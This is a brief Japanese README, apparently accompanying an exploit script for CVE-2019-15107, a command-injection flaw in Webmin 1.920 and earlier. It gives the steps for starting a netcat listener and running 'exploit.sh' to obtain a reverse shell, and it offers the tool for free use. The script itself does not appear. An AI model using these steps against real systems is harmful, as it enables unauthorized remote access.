
webmin <=1.920 - コマンドインジェクションの脆弱性によるRCE
https://www.cvedetails.com/cve/CVE-2019-15107/
Webmin <=1.920 に問題が発見されました。password_change.cgi のパラメータ "old" と "expire" には、コマンドインジェクションの脆弱性が含まれています。
rlwrap -cAr nc -lvp 1919
./exploit.sh
実行を続けると、リスナー上でリバースシェルが受信されます。

いつでもどこでも自由に使用・変更できます。